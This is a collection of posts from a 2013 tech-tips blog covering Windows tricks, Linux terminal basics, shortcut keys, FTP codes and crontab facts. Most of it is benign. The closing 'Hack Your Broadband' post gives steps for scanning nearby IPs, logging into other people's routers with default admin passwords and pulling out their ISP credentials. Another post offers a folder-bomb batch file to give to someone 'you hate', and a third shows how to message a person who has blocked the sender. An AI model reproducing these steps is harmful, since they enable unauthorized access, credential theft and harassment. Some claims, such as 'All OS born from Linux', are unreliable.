Saturday, July 20, 2013

How To Watch 18+ Youtube Videos Without Logging In ?

How To Watch 18+ Youtube Videos Without Logging In ?
1.   First get the Url of video you want to watch. As shown below.
http://www.youtube.com/watch?v=4Xkh6j7RMqk 
2.   Then copy the Video Id. For above link video Id is 4Xkh6j7RMqk
3.   Now paste the Video Id in the link given below.
      http://www.youtube.com/v/VideoId?fs=1
      Replace VideoId with the Id you copied in Step 2
4.   Now the url will become as shown below.
      http://www.youtube.com/v/4Xkh6j7RMqk?fs=1

5.   Done.

Hidden Star Wars Movie in Windows

Microsoft has hidden a version of Star Wars done entirely with ASCII characters in the Windows operating system.
But you must be connected to internet to view it.When online
       1. go to start->
       2. run -> CMD.
       3. Now type ' telnet towel.blinkenlights.nl ' without the single quotes.See it for yourself.

Cool funny computer pranks and tricks and stupidities.

Hey there! In this article I will let you know about some awesome computer tips and tricks. If you want to learn something new and exciting then please keep reading :) 

1).    Use Monoface to make funny faces and have fun. Go to Monoface and create faces by just clicking on it . Don't blame me if you freak out of yourself at the 1st time.

2).   Multiple user login in yahoo Massager without any software or patch: You can login to yahoo messenger with multiple user ID without any software or patch. You just have to do a simple Task. First click Start menu and then click run, then type regedit and then press enter. A box will appear now from the box navigate HKEY_CURRENT_USER , then from the list select SOFTWARE , then from the software select YAHOO , then from Yahoo select PAGER , then from Pager select TEST. Now right click on the TEST and then click Dword value. In the right side you will notice a new folder appears, Rename it as Plural. Then double click it then select decimal and give the value 1 in the value box and click OK. That's it now try to login in yahoo messenger with multiple ID. (you will find this tricks as the most useful trick )

3).   Watch Star wars Movie in your PC : Do you know you can watch Star wars Text movie from your computer. To watch it click the start button then click Run . Type telnet in run. You will find DOS black screen. in the black screen of Dos , type o and click enter and again typetowel.blinkenlights.nl and click enter . That's it, the text movie will begin, wait for few seconds and enjoy it . :)

4).  Watch Videos on megavideo without any time limit: We often get annoyed when we watch an online movie in Megavideo and suddenly after 72 minutes it interrupts. To avoid this problem first copy the video link of megavideo and then Click here . Then past the link to this website and enjoy the movie without any interruption.

5).    Make an invisible Folder: In my previous Hubs i have told you how to make a folder without any names. Now i am going to show you how to make a complete invisible folder to your desktop. You can surprise people by doing this trick. At first you have to make the folder without any name. So first the folder then right click and click rename , remove the name (by backspace or delete button) , hold in that position. Be sure your numlock is on, if not then make it on. Now press and hold ALT button and type 0160 (remember you must have to hold ALT button and typw the code from the num pad must, it won't appear in the screen) . When you complete typing the code, release ALT and press enter . you will see a folder without no name. At first try it will be difficult for you to acquire the whole tricks but eventually you will get it right. So try , apology if i failed to make you understand .
       Now the second part is easy, you just have to make the folder invisible. To do that select the folder, right click go to properties , click customize , then click Change icon and then you will find many icons available, slowly search for an icon that doesn't show, i mean an invisible icon totally blank, select and then apply .
       That’s it, The invisible folder is ready, You can also make it invisible without removing the name. Then only name will appear without the folder

6).    On-Screen Keyboard: Ohk this is the most simple trick, in fact it is not a trick. It's for those who yet hasn't heard about it. Sometimes you may need to type something urgently but if you found that your keyboard is not working what you will do? You simple just click Start, then click all programs , then accessories , then accessibility and then click on-screen key board . That’s it, you can type through the mouse only.

7).    Create Shutdown, log off or hibernate shortcut key: Sometimes we get too lazy and we need some easier way to do our work. Let’s create shortcut key to shutdown our computers. At first right click on your desktop free space then click new and select shortcut. A box will appear and type the following word exactly shutdown -r -t 0 . then click ok. A new shortcut folder will be created and you can shut down your computer immediately . For log off or stand by copy the following :
         Restart: shutdown -r -t 0
         Logoff: shutdown -l -t 0
                Hibernate: rundll32.exe PowrProf.dll, SetSuspendState Hibernate

Enjoy

Basic Shortcut Keys

Shortcut Keys
Supported Window Versions
Description
Alt + e
Windows OS
Pull down the top Edit menu.
Alt + f
Windows OS
Pull down the top File menu
Ctrl + a
Windows OS
Select all text.
Ctrl + c
Windows OS
Copy selected item(s) (to clipboard).
Ctrl + f
Windows OS
Find.
Ctrl + v
Windows OS
Paste copied item(s) from clipboard
Ctrl + x
Windows OS
Cut.
Ctrl + Ins
Windows OS
Same as Ctrl + c
Ctrl + (left arrow)
Windows OS
Move one word to the left at a time.
Ctrl + (right arrow)
Windows OS
Move one word to the right at a time.
Shift + Ins
Windows OS
Same as Ctrl + v
Shift+Delete (or Del)
Windows OS
Cut. Or permanently delete selected item(s) on Windows Explorer.
F1
Windows OS
Help.
Home
Windows OS
Jump to the beginning of the line or page.
Ctrl + Home
Windows OS
Jump to the beginning of the document or page.
End
Windows OS
Jump to the end of the line or page.
Ctrl + End
Windows OS
ump to the end of the document or page.
Shift + Home
Windows OS
Set selection (highlight) from current position to beginning of the line or page.
Shift + End
Windows OS
Set selection (highlight) from current position to end of the line or page.
Shift + (left arrow)
Windows OS
Set selection (highlight) from current position to the left, one character at a time.
Shift + (right arrow)
Windows OS
Set selection (highlight) from current position to the right, one character at a time.
Shift+(down arrow)
Windows OS
Set selection (highlight) from current position to the next line down.
Shift + (up arrow)
Windows OS
Set selection (highlight) from current position to the next line up.

Monday, July 15, 2013

Introduction To Basic Terminal Commands For Linux

In this tutorial you will learn to use linux terminal. You will learn to navigate on the terminal, learn to create and remove file and much more. Most of this commands also works on Mac Os X and powershell on windows.

What Is Terminal ?
Basically you are reading this tutorial because you are new to linux or want to learn using terminal to navigate. Before you get started you must have linux installed or running virtually on your computer. I would recommend downloading fedora or ubuntu (If you have trouble installing ubuntu leave a comment below and i will post a tutorial).

Commands To Remember
This are some of commands you must remember which will help you to use terminal more easily.
ls - it will list all files and folder in your current directory
ls -l it will give detail listing of all files and folders
ls -a it will list all files and folder in your current directory including hidden files (files and folders that begin with period)
pwd - will print your working directory or simply your current directory

Navigating In Terminal
Here i may refer folder as directory so dont get confused. This is the term we use in linux for folders.

cd - cd stands for change directory. we use cd follow by path address to navigate ro that folder.
Eg: cd Desktop will make desktop as my current directory.
cd / will make root as you current directory
cd ~ will make home as your current directory
Typing cd alone is same as cd ~ and it will make home as your current directory
cd .. will make parent directory i.e directory above your current directory
cd ../../ will take you two folder up

Creating Files And Folder
mkdir - we use mkdir follow by path or folder name to create a directory
Eg mkdir car will create directory car in your current directory
to create folder recursively i.e folder inside folder inside folder we use -p flag
Eg mkdir -p vehicles/car/truck will create directory vehicles in your current directory which have car inside it and car has directory truck in it.

touch - we use touch follow by file name to create empty file.

Removing Files And Folders
rmdir - we use rmdir follow by path to to remove any directory. This will not work if folder you are trying to remove has something in it.
rm -r to remove file recursively which can not be removed by rmdir
rm - We use this command to remove files

Hope you Guys Enjoyed 

Rename Recycle Bin

1. Start, Run, 'Regedit'.
2. Press 'Ctrl'+'F' to open find box and type 'Recycle Bin' to search.
3. Change any value data with 'Recycle Bin' to whatever name you want to give it ( i.e, like 'Trash Can' or 'Dump' etc).
4. Press F3 to continue searching for 'Recycle Bin' and change wherever you come across 'Recycle Bin' to new its new name.
5. Repeat step 4 until you have finished with searching and changed all values to its new name.
6. Close regedit and hit F5 on desktop to see the new name on screen.


Note: As a good practice, always backup your registry before changing anything although changing 'Recycle Bin' name is a simple tweak and doesn't affect anything else.

Enjoy

WINDOWS XP HIDDEN APPS

To run any of these apps go to Start > Run and type the executable name (I.e  charmap).
=========================================

1) Character Map = charmap.exe (very useful for finding unusual characters)

2) Disk Cleanup = cleanmgr.exe

3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)

4) Dr Watson = drwtsn32.exe (Troubleshooting tool)

5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)

6) Private character editor = eudcedit.exe (allows creation or modification of characters)

7) I Express Wizard = iexpress.exe (Create self-extracting / self-installing package)

8) Microsoft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).

9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).

10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)

11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).

12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )

13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).

14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).

15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).

16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).

17) File signature verification tool = sigverif.exe

18) Volume Contro = sndvol32.exe (I've included this for those people that lose it from the System Notification area).

19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98! ).

20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications).

21) Microsoft Telnet Client = telnet.exe

22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).

23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).

24) System configuration = msconfig.exe (can use to control startup programs)

25) gpedit.msc used to manage group policies, and permissions


 Enjoy

COMMON FTP ERROR CODES

110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").

120 Service ready in nnn minutes.

125 Data connection already open; transfer starting.

150 File status okay; about to open data connection.

200 Command okay.

202 Command not implemented, superfluous at this site.

211 System status, or system help reply.

212 Directory status.

213 File status.

214 Help message.On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.

215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.

220 Service ready for new user.

221 Service closing control connection.

225 Data connection open; no transfer in progress.

226 Closing data connection. Requested file action successful (for example, file transfer or file abort).

227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).

230 User logged in, proceed. Logged out if appropriate.

250 Requested file action okay, completed.

257 "PATHNAME" created.

331 User name okay, need password.

332 Need account for login.

350 Requested file action pending further information

421 Service not available, closing control connection.This may be a reply to any command if the service knows it must shut down.

425 Can't open data connection.

426 Connection closed; transfer aborted.

450 Requested file action not taken.

451 Requested action aborted. Local error in processing.

452 Requested action not taken. Insufficient storage space in system.File unavailable (e.g., file busy).

500 Syntax error, command unrecognized. This may include errors such as command line too long.

501 Syntax error in parameters or arguments.

502 Command not implemented.

503 Bad sequence of commands.

504 Command not implemented for that parameter.

530 Not logged in.

532 Need account for storing files.

550 Requested action not taken. File unavailable (e.g., file not found, no access).

551 Requested action aborted. Page type unknown.

552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).

553 Requested action not taken. File name not allowed.

Sunday, July 14, 2013

How To Lock Folder?


   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title folder lock
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST My Folder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== {Your password} goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name My Folder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command prompt appears Type Y and press enter.
   6. Now My Folder will be hidden from you view, to access that folder double click on lock.bat

   7. It will ask for password enter your password and done. 

Enjoy

Friday, July 12, 2013

Web Browsing Tricks

Automatically add www. and .com to a URL :-You can shave off a couple of seconds typing in a URL by simply click CTRL + Enter after you type the name of the site. Need .net instead of .com, press CTRL + Shift + Enter instead.
Jump to address bar :-There are a number of ways to jump right to the address bar from anywhere in browser. Pressing CTRL + L, F6, and ALT + D all accomplish this goal.
Bring back a closed tab :-We covered this already, but it's super useful. Accidentally closed a tab? Simply press CTRL + Shift + T to reopen the most recently closed tab and get back to what you were doing.
Use private browsing :-The uses for not having cookies and history saved are obvious for certain activities, you know, like shopping for gifts on a shared computer (of course!). Pressing CTRL + Shift + N will launch a new private in Chrome, CTRL + Shift + P will do it in Firefox and Internet Explorer.
Cycle through open tabs :-Pressing CTRL + TAB while in a browser will flip between each one. This can be much faster than moving the mouse and clicking on a tab. CTRL + NUM (1, 2, 3, 4, n..) will also take you to certain tab in that numeric order.
Enjoy+

SHORTCUT PEN DRIVE "VIRUS"

If ur pen drives get infected wid the new "SHORTCUT VIRUS" then u can remove it using this simple method.....

1. Open cmd as administrator;

2. type the command attrib -h -r -s /s /d X:\*.* (Replace X with ur pen drive letter)

DONE!! Also, create an 'Autorun.inf' blank file in pen drive & make it read only or inaccessible from security tab which will possibly prevent this infection.

Rnjoy

Linux instead of Windows and Mac ?

*Linux is advanced High Level OS

*24/7 always virus free

*Greatest OS for Programmers to develop Soft.

*Always free

*All OS born from Linux only

*Linux contain all types of Programming lan and Hacking tools

*Linux is the No. 1 for Server and Client Scripting .

*Windows is Base and Linux is Race

*Linux have high developed Programmed

*Linux is the open source OS

*Google Web Server (GWS) — Custom Linux-based Web server that Google uses for its online services.

*Novell in 2006 migrate from Windowsto Linux

* IBM Supports Linux 100%

* Amazon.comis said to "use Linux in nearly every corner of its business

*Cisco Systems, the computer networking and routing giant, switched to Linux


Enjoy Linux...

A few shortcut keys for Google Chrome

Here is a list of a few shortcut keys of Google Chrome.
Ctrl+t New tab
Ctrl+w Close tab
Ctrl+n New Window
Ctrl+1 to Ctrl+8 Jump tab 1 to 8
Ctrl+Shift+N New incognito window
Alt+D Go to address bar
Ctrl++ / Ctrl+- Zoom in / Zoom out
F11 Full Screen on/off
Ctrl+Shift+t Open closed tab
Ctrl+Shift+i Open developers tools

A few useful Chrome URLs
chrome://extensions Open extensions
chrome://history Open history
chrome://feedback Open feedback
chrome://cache Open cache
chrome://crashes Open crash reporting
chrome://crash Open crash page
chrome://flash Open flash extension details
chrome://flags Open flags settings


Enjoy

What is cookie ?

A cookie is a very small text file placed on your hard drive by a Web Page server. It is essentially your identification card, and cannot be executed as code or deliver viruses. It is uniquely yours and can only be read by the server that gave it to you. 
A Cookie's Purpose is to tell the server that you've returned to that Web page. It can save you time. If you personalize pages, or register for products or services, a cookie helps that company remember who you are. So, the next time that you visit, they will have a good idea of what to show you. Or, for your convenience, you would not have to re-register as the cookies would provide this information from your previous visit.

WARNING: You are always in control of what information that you provide to anyone while online. You need to be cautious of some web sites that request too much information about you.

If You Want to Control Which Cookies You Accept:
You can order your browser to accept all cookies or to alert you every time a cookie is offered. Then you can decide whether to accept one or not.


Enjoy

Send messages on fb even if you are BLOCKED!

Send messages on fb even if you are BLOCKED!

To perform this trick first of all u need fb username of that person to which you are going to send msg.
Go to your primary email id(gmail,yahoo etc)
Compose a new msg to username@facebook.com
(username= fb id of receiver)

Now you can send your victim whatever you want... ]:-)

Enjoy

BAD trick for someone you Hate

How to do a BAD trick for someone you Hate :p
-----------------------------------------------------------

1. An awesome trick through which you can
make 3000 folder at a time:

FOLDER BOMBER

This batch file will create 3000+ folder
in less than a minute.

Open your notepad and type the following
codes.

@echo off
:top
md %random%
goto top

Save it as 3000.bat
Give this file to your 'friend' and when he
will click on that his nightmare will be
started.

Enjoy

Facts about CRONTAB

Here come some important facts about crontab.

I know, you know. But read it, you might find them interesting.

1. Whenever you issue some cron job either for yourself (i.e. root) or some other person. Cron searches its spool area (/var/spool/cron/crontabs) for crontab files, for every user which is there in /etc/passwd file there is one associated crontab file. If crontab found a cron in this location it will load into memory. You cannot directly edit these file.
"So for a user alok, his crontab location would be /var/spool/cron/alok."

2. Crontab Time issue - Special considerations exist when, for any reason you had changed the system clock time by less than 3 hours.

If the time has moved forwards, those jobs which would have run in the time that was skipped will be run soon after the change.

Likewise, if the time has moved backwards by less than 3 hours, those jobs that fall into the repeated time will not be re-run.

Only jobs that run at a particular time (not specified as @hourly, nor with '*' in the hour or minute specifier) are affected. Jobs which are specified with wild cards are run based on the new time immediately.

Clock changes of more than 3 hours are considered to be corrections to the clock, and the new time is used immediately.

3. If the users account has a crontab but no use-able shell in /etc/passwd then the cronjob will not run. You will have to give the account a shell for the crontab to run.

4. You can not use % in the command area. They will need to be escaped and if used with a command like the date command you can put it in backticks. Ex. `date +\%Y-\%m-\%d`

5. Instead of the first five fields, one of eight special strings may appear:
string meaning
------ -------
@reboot Run once, at startup.
@yearly Run once a year, "0 0 1 1 *".
@annually (same as @yearly)
@monthly Run once a month, "0 0 1 * *".
@weekly Run once a week, "0 0 * * 0".
@daily Run once a day, "0 0 * * *".
@midnight (same as @daily)
@hourly Run once an hour, "0 * * * *".

Enjoy

Top Ten Password Cracking Methods

=============Top Ten Password Cracking Methods================

1. Dictionary attack
"This uses a simple file containing words that can, surprise surprise, be found in a dictionary. In other words, if you will excuse the pun, this attack uses exactly the kind of words that many people use as their password..."

2. Brute force attack
"This method is similar to the dictionary attack but with the added bonus, for the hacker, of being able to detect non-dictionary words by working through all possible alpha-numeric combinations from aaa1 to zzz10..."

3. Rainbow table attack
"A rainbow table is a list of pre-computed hashes - the numerical value of an encrypted password, used by most systems today - and that’s the hashes of all possible password combinations for any given hashing algorithm mind. The time it takes to crack a password using a rainbow table is reduced to the time it takes to look it up in the list..."

4. Phishing
"There's an easy way to hack: ask the user for his or her password. A phishing email leads the unsuspecting reader to a faked online banking, payment or other site in order to login and put right some terrible problem with their security..."

5. Social engineering
"A favourite of the social engineer is to telephone an office posing as an IT security tech guy and simply ask for the network access password. You’d be amazed how often this works..."

6. Malware
"A key logger or screen scraper can be installed by malware which records everything you type or takes screen shots during a login process, and then forwards a copy of this file to hacker central..."

7. Offline cracking
"Often the target in question has been compromised via an hack on a third party, which then provides access to the system servers and those all-important user password hash files. The password cracker can then take as long as they need to try and crack the code without alerting the target system or individual user..."

8. Shoulder surfing
"The service personnel ‘uniform’ provides a kind of free pass to wander around unhindered, and make note of passwords being entered by genuine members of staff. It also provides an excellent opportunity to eyeball all those post-it notes stuck to the front of LCD screens with logins scribbled upon them..."

9. Spidering
"Savvy hackers have realised that many corporate passwords are made up of words that are connected to the business itself. Studying corporate literature, website sales material and even the websites of competitors and listed customers can provide the ammunition to build a custom word list to use in a brute force attack..."

10. Guess
"The password crackers best friend, of course, is the predictability of the user. Unless a truly random password has been created using software dedicated to the task, a user generated ‘random’ password is unlikely to be anything of the sort..."


Enjoy

Thursday, July 11, 2013

CRAZY GOOGLE TRICKS
------------------------------------------------------------------
We all use google for searching but its time to explore the funny side of google.Here I have collected the top 7 funny google tricks that will amaze you.Some of the tricks are provided by google itself while other have been developers.

1. Google Gravity:-
We all have read the Newton’s law of gravity.Does it also apply to google?To test it follow the instructions,
Go to google.com
Type Google Gravity
Click on I’m feeling Lucky
Now you will see the effect of gravity on google.The google icon will fall down automatically.You can even pickup and throw google icon anywhere

2. Google Pacman Game:-
Play Google Pacman Game Goto googlepacmangame.com

3. Change Background Image:-
You can also change the background image of google in google chrome. To change the background image follow the instructions,
Go to google.com
Click on the Change Background Image
Login with gmail username and upload Image

4. Epic Google:-
In epic google you will see the font size of google increasing automatically as if it will come out of your computer screen.To use google Follow the instructions
Go to google.com
Type Epic Google
Click on I’m feeling Lucky

5.Google Sphere:-
Google Sphere is a fun trick. It will start rotating all links on google in sphere. you can change rotation of sphere by moving cursor.Follow The Below Steps
Go to Google homepage
Type Google sphere
Click on I’m feeling Lucky

6. Google Hacker:-
want to see how the google homepage will look if it gets hacked .Follow the instructions below,
Go to google.com
Type Google Hacker
Click on I’m feeling Lucky

7. Annoying Google:-
In this trick the capitalisation of your searches will change automatically.Some words will change into small letter and some into capital letters in your search result.Want to try it follow the instructions
Go to google.com
Type Annoying Google
Click on I’m feeling Lucky

8. Google Loco:-
In This Trick Google Logo Will Dancing In Free Mod, To Try This Out Follow The Instructions,
Go To google.com
Type Google Loco
Click On I’m feeling lucky :P
Hack Your Broadband

Step 1: Download any port Scanner (i preffer Super Scan or IPscanner)

Step 2: First Get your ip from

CODE www.whatismyip.com

Asume your IP to be 59.x.x.17

Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range

start:59.x.x.1 to End:59.x.x.255

Step 4: Then check in your scanner which alive IPs has the port 80 open

Step 5: Enter that alive IP in your web browser

Step 6: It asks for user , pass

Type u
User=admin
Password=admin or password
It is the default password for most of the routers.

if denied then use on another alive IP

Step 7: If success then it will show router settings page of tht IP user

There goto Home -> Wan Setting and the username and password of his account will appear there.

Step 8: use ShowPassword or Revelation software to view the password in asterisks

Now You have Username/Password
Enjoy!